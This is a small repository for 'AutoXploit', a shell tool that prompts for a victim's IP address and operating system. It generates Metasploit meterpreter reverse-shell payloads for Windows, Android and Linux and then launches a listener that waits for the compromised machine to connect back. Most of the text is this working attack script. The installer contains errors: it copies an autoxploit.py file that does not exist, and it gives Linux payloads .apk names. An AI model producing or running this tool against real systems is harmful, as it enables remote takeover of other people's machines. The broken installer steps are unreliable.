├── LICENSE
├── README.md
├── autoxploit.sh
└── install.sh
/LICENSE:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2019, y_k_007
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | 1. Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | 2. Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | 3. Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
AutoXploit
2 |
3 |
4 | Auto Payload Generator & Exploiter
5 |
6 |

7 |
8 | AutoXploit is simply a shell sciript that helps you to generate metasploit payloads and starts the meterpreter handler quickly. At times, security researchers have to generate payloads and listen to the connection through handler constantly, AutoXploit not only allows you to quickly generate payloads but it also has an option to start the handler automatically.
9 |
10 | ### Prerequisite
11 | You should have a linux based system with metasploit-framework installed.
12 |
13 | ### Installation
14 | Run `install.sh` as sudo and it will automatically install AutoXploit.
15 | ```
16 | $ git clone https://github.com/Yashvendra/AutoXploit.git
17 | $ cd AutoXploit
18 | $ chmod +x install.sh
19 | $ sudo ./install.sh
20 | ```
21 |
22 | ### Usage
23 | Make sure you run this script as super user.
24 | ```
25 | $ sudo autoxploit
26 | ```
27 | ### Gallery
28 | 
29 |
30 | ### Upcoming Updates
31 | Auxiliary scanners are on the way :)
32 |
33 | ##### Note: This script is made for educational purposes and to help security researchers. Any actions or activities performed using this script is solely your responsibility.
34 |
--------------------------------------------------------------------------------
/autoxploit.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | Black='\033[1;30m' # Black
3 | Red='\033[1;31m' # Red
4 | Green='\033[1;32m' # Green
5 | Yellow='\033[1;33m' # Yellow
6 | Blue='\033[1;34m' # Blue
7 | Purple='\033[1;35m' # Purple
8 | Cyan='\033[1;36m' # Cyan
9 | White='\033[1;37m' # White
10 | NC='\033[0m'
11 | blue='\033[0;34m'
12 | white='\033[0;37m'
13 | lred='\033[0;31m'
14 |
15 | root=$( id -u )
16 | folder='~/Desktop/payloads'
17 |
18 |
19 |
20 | logo () {
21 | echo -e "\033[1;31m \t
22 | \t░█▀█░█░█░▀█▀░█▀█░█░█░█▀█░█░░░█▀█░▀█▀░▀█▀
23 | \t░█▀█░█░█░░█░░█░█░▄▀▄░█▀▀░█░░░█░█░░█░░░█░
24 | \t░▀░▀░▀▀▀░░▀░░▀▀▀░▀░▀░▀░░░▀▀▀░▀▀▀░▀▀▀░░▀░
25 | \033[1;36m--=By: Yashvendra Kashyap a.k.a y_k_007=--
26 | ";
27 |
28 | }
29 |
30 | target () {
31 | echo -ne "\n${Blue}[#] Enter IP of the victim's machine: ${White}"; read ip
32 | echo -ne "${Blue}[#] Enter a Port no.: ${White}"; read port
33 | echo -ne "${Blue}[#] Enter the FILE name: ${White}"; read file
34 | }
35 |
36 | windows () {
37 | clear
38 | logo
39 | echo -e "\n"
40 | sleep 0.3
41 | echo -e "${Blue}+-------------------------------------------------------+"
42 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Windows${Yellow}] ${Blue} +"
43 | echo -e "${Blue}+-------------------------------------------------------+${NC}"
44 | sleep 0.3
45 | echo -ne "${Blue}+ "
46 | echo -e "${White}[1] ${Purple}windows/meterpreter/reverse_tcp ${Blue} +"
47 | echo -e "+ ${White}[2] ${Purple}windows/meterpreter/reverse_http ${Blue} +"
48 | echo -e "+ ${White}[3] ${Purple}windows/meterpreter/reverse_tcp_dns ${Blue} +"
49 | echo -e "+ ${White}[4] ${Purple}windows/meterpreter/reverse_https ${Blue} +"
50 | echo -e "+ ${White}[5] ${Purple}windows/meterpreter/reverse_tcp_uuid ${Blue} +"
51 | echo -e "+ ${White}[6] ${Purple}windows/meterpreter/reverse_winhttp ${Blue} +"
52 | echo -e "+ ${White}[7] ${Purple}windows/meterpreter/reverse_winhttps ${Blue} +"
53 | echo -e "${Blue}+-------------------------------------------------------+"
54 | sleep 0.3
55 | echo -ne "${Green}[#] Choose a payload: ${White}"
56 | read payloadWindow
57 |
58 | case $payloadWindow in
59 |
60 | 1)
61 | target
62 | echo
63 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
64 | echo
65 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null
66 | payload='windows/meterpreter/reverse_tcp' ;;
67 |
68 | 2)
69 | target
70 | echo
71 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
72 | echo
73 | msfvenom -p windows/meterpreter/reverse_http LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null
74 | payload='windows/meterpreter/reverse_http' ;;
75 |
76 | 3)
77 | target
78 | echo
79 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
80 | echo
81 | msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null
82 | payload='windows/meterpreter/reverse_tcp_dns' ;;
83 |
84 | 4)
85 | target
86 | echo
87 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
88 | echo
89 | msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null
90 | payload='windows/meterpreter/reverse_https' ;;
91 |
92 | 5)
93 | target
94 | echo
95 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
96 | echo
97 | msfvenom -p windows/meterpreter/reverse_tcp_uuid LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null
98 | payload='windows/meterpreter/reverse_tcp_uuid' ;;
99 |
100 | 6)
101 | target
102 | echo
103 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
104 | echo
105 | msfvenom -p windows/meterpreter/reverse_winhttp LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null
106 | payload='windows/meterpreter/reverse_winhttp' ;;
107 |
108 | 7)
109 | target
110 | echo
111 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
112 | echo
113 | msfvenom -p windows/meterpreter/reverse_winhttps LHOST=$ip LPORT=$port -f exe > ~/Desktop/payloads/$file.exe 2>/dev/null
114 | payload='windows/meterpreter/reverse_winhttps' ;;
115 |
116 | *)
117 | echo -e "${Cyan}[*] INVALID CHOICE!"
118 | sleep 1
119 | exit ;;
120 |
121 | esac
122 | }
123 |
124 | android () {
125 | clear
126 | logo
127 | echo -e "\n"
128 | echo -e "${Blue}+-------------------------------------------------------+"
129 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Android${Yellow}] ${Blue} +"
130 | echo -e "${Blue}+-------------------------------------------------------+${NC}"
131 | sleep 0.3
132 | echo -ne "${Blue}+ "
133 | echo -e "${White}[1] ${Purple}android/meterpreter/reverse_tcp ${Blue} +"
134 | echo -e "+ ${White}[2] ${Purple}android/meterpreter/reverse_https ${Blue} +"
135 | echo -e "+ ${White}[3] ${Purple}android/meterpreter/reverse_http ${Blue} +"
136 | echo -e "${Blue}+-------------------------------------------------------+"
137 | sleep 0.3
138 | echo -ne "${Green}[#] Choose a payload: ${White}"
139 | read payloadAndro
140 |
141 | case $payloadAndro in
142 |
143 | 1)
144 | target
145 | echo
146 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
147 | echo
148 | msfvenom -p android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
149 | payload='android/meterpreter/reverse_tcp' ;;
150 |
151 | 2)
152 | target
153 | echo
154 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
155 | echo
156 | msfvenom -p android/meterpreter/reverse_https LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
157 | payload='android/meterpreter/reverse_https' ;;
158 |
159 | 3)
160 | target
161 | echo
162 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
163 | echo
164 | msfvenom -p android/meterpreter/reverse_http LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
165 | payload='android/meterpreter/reverse_http' ;;
166 |
167 | * )
168 | echo -e "${Cyan}[*] INVALID CHOICE!"
169 | sleep 1
170 | exit ;;
171 |
172 | esac
173 | }
174 |
175 | linux (){
176 | clear
177 | logo
178 | echo -e "\n"
179 | echo -e "${Blue}+-------------------------------------------------------+"
180 | echo -e "+\t${Green}Available Payloads for ${Yellow}[${Purple}Linux${Yellow}] ${Blue} +"
181 | echo -e "${Blue}+-------------------------------------------------------+${NC}"
182 | sleep 0.3
183 | echo -ne "${Blue}+ "
184 | echo -e "${White}[1] ${Purple}linux/x86/meterpreter_reverse_tcp ${Blue} +"
185 | echo -e "+ ${White}[2] ${Purple}linux/x86/meterpreter_reverse_https ${Blue} +"
186 | echo -e "+ ${White}[3] ${Purple}linux/x86/meterpreter_reverse_http ${Blue} +"
187 | echo -e "+ ${White}[4] ${Purple}linux/x86/meterpreter/reverse_tcp_uuid ${Blue} +"
188 | echo -e "+ ${White}[5] ${Purple}linux/x86/meterpreter/reverse_ipv6_tcp ${Blue} +"
189 | echo -e "+ ${White}[6] ${Purple}linux/x86/meterpreter/reverse_nonx_tcp ${Blue} +"
190 | echo -e "${Blue}+-------------------------------------------------------+"
191 | sleep 0.3
192 | echo -ne "${Green}[#] Choose a payload: ${White}"
193 | read payloadlinux
194 |
195 | case $payloadlinux in
196 |
197 | 1)
198 | target
199 | echo
200 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
201 | echo
202 | msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
203 | payload='linux/x86/meterpreter_reverse_tcp' ;;
204 |
205 | 2)
206 | target
207 | echo
208 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
209 | echo
210 | msfvenom -p linux/x86/meterpreter_reverse_https LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
211 | payload='linux/x86/meterpreter_reverse_https' ;;
212 |
213 | 3)
214 | target
215 | echo
216 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
217 | echo
218 | msfvenom -p linux/x86/meterpreter_reverse_http LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
219 | payload='linux/x86/meterpreter_reverse_http' ;;
220 |
221 | 4)
222 | target
223 | echo
224 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
225 | echo
226 | msfvenom -p linux/x86/meterpreter/reverse_tcp_uuid LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
227 | payload='linux/x86/meterpreter/reverse_tcp_uuid' ;;
228 |
229 | 5)
230 | target
231 | echo
232 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
233 | echo
234 | msfvenom -p linux/x86/meterpreter/reverse_ipv6_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
235 | payload='linux/x86/meterpreter/reverse_ipv6_tcp' ;;
236 |
237 | 6)
238 | target
239 | echo
240 | echo -ne "\033[01;36m[*] Payload is being created"; sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".";sleep 0.3;echo -ne ".\n"
241 | echo
242 | msfvenom -p linux/x86/meterpreter/reverse_nonx_tcp LHOST=$ip LPORT=$port R > ~/Desktop/payloads/$file.apk 2>/dev/null
243 | payload='linux/x86/meterpreter/reverse_nonx_tcp' ;;
244 |
245 |
246 | * )
247 | echo -e "${Cyan}[*] INVALID CHOICE!"
248 | sleep 1
249 | exit ;;
250 |
251 | esac
252 | }
253 |
254 |
255 | if [ $root != 0 ] ; then
256 | echo -e "${Purple}[#] Run this Script as 'sudo'! "
257 | sleep 2
258 | exit
259 | fi
260 |
261 | if [ -e $folder ] ; then
262 | cd ~/Desktop/payloads
263 | else
264 | mkdir ~/Desktop/payloads && cd ~/Desktop/payloads
265 | fi
266 |
267 |
268 | clear
269 | logo
270 | sleep 0.3
271 | echo -e "${Yellow}[*] Payloads are available For-\n"
272 | sleep 0.3
273 | echo -e " ${White}[1] ${Blue}Windows"
274 | echo -e " ${White}[2] ${Blue}Android"
275 | echo -e " ${White}[3] ${Blue}Linux\n"
276 | sleep 0.3
277 | echo -ne "${Green}[#] Choose Victim's OS:${White} "
278 | read OS
279 |
280 | case $OS in
281 |
282 | 1)
283 | windows;;
284 |
285 | 2)
286 | android ;;
287 |
288 | 3)
289 | linux ;;
290 |
291 | * )
292 | echo -e "${Cyan}[*] INVALID OPTION"
293 | sleep 1
294 | echo -e "${Cyan}[*] Exiting..."
295 | sleep 0.2
296 | exit ;;
297 |
298 | esac
299 |
300 | echo -e "${Purple}[*] Payload has been saved in the desktop folder '${Cyan}payloads${Purple}'"
301 | sleep 0.3
302 | echo -ne "${Green}[#] Do you want to automatically configure the handler and let it listen? [${Cyan}y${Green}/${Cyan}n${Green}]: ${White}"
303 | read p
304 | if [ $p = "y" ]
305 | then
306 | clear
307 | echo -e "${Green}[*] OPENING ${Purple}MSFCONSOLE${Green}... "
308 | msfconsole -q -x "use multi/handler; set PAYLOAD $payload ; set LHOST $ip ; set LPORT $port ; exploit "
309 | elif [ $p = "n" ]
310 | then
311 | echo -e "${Cyan}[*] Byee! See you soon."
312 | sleep 0.2
313 | exit
314 | else
315 | echo -e "${Cyan}[*] INVALID OPTION"
316 | sleep 0.2
317 | echo -e "${Cyan}[*] Exiting..."
318 | sleep 0.2
319 | exit
320 | fi
321 |
322 |
323 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | Green='\033[0;32m'
3 | white='\033[0;37m'
4 | NC='\033[0m'
5 | clear
6 | printf '\033]2; INSTALLER\a'
7 | echo -e "${Green}[*] Press \e[0;33many key\e[0;32m to install AutoXploit..."
8 | read -n 1
9 | clear
10 |
11 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
12 |
13 | if [[ "$DIR" != "/root/AutoXploit" ]]
14 | then
15 | echo -e "\033[0;35m[~] I will install it for you..."
16 | sleep 4
17 | if [[ -d /root/AutoXploit ]]
18 | then
19 | rm -r /root/AutoXploit
20 | fi
21 | mkdir /root/AutoXploit
22 | cp -r "$DIR"/* /root/AutoXploit
23 | chmod +x /root/AutoXploit/install.sh
24 | #gnome-terminal -- bash -c "sudo /root/bootmiester/install.sh; exec bash"
25 | fi
26 | echo -e "${Green}[+] Installing AutoXploit..."
27 | sleep 1
28 | echo -e "${Green}[+] Fixing permissions..."
29 | sleep 2
30 | chmod +x /root/AutoXploit/autoxploit.py
31 | clear
32 | echo -e "${Green}[+] Copying Tool to /bin/autoxploit"
33 | cd /root/AutoXploit
34 | cp /root/AutoXploit/autoxploit.py /bin/autoxploit
35 | clear
36 |
37 | while true
38 | do
39 | clear
40 | echo -e "${Green}[*] Are you \e[0;33mu\e[0;32mpdating or \e[0;33mi\e[0;32mnstalling the script?(\e[0;33mu\e[0;32m/\e[0;33mi\e[0;32m): "
41 | echo -e "${Green}[#] Only use 'i' for the first time."
42 | read UORI
43 | if [[ "$UORI" = "u" ]]
44 | then
45 | clear
46 | echo -e "This feature is currently under construction.."
47 | sleep 3
48 | exit
49 | elif [[ "$UORI" = "i" ]]
50 | then
51 | clear
52 | BASHCHECK=$(cat ~/.bashrc | grep "/bin/autoxploit")
53 | if [[ "$BASHCHECK" != "" ]]
54 | then
55 | echo -e "I SAID USE i ONLY ONE TIME..........."
56 | sleep 3
57 | break
58 | fi
59 | echo -e "${Green}[#] Adding AutoXploit to PATH so you can access it from anywhere"
60 | sleep 1
61 | export PATH=/bin/autoxploit:$PATH
62 | sleep 1
63 | echo "export PATH=/bin/autoxploit:$PATH" >> ~/.bashrc
64 | sleep 1
65 | clear
66 | break
67 | fi
68 | done
69 | sleep 1
70 | echo -e "${Green}[#] Installation is finished. Type 'sudo autoxploit' to launch the script after we exit."
71 | sleep 0.5
72 | echo -en "${Green}[+] Starting AutoXploit"; sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ;sleep 0.5 ;echo -en "." ;
73 | sudo autoxploit
74 |
75 |
76 |
--------------------------------------------------------------------------------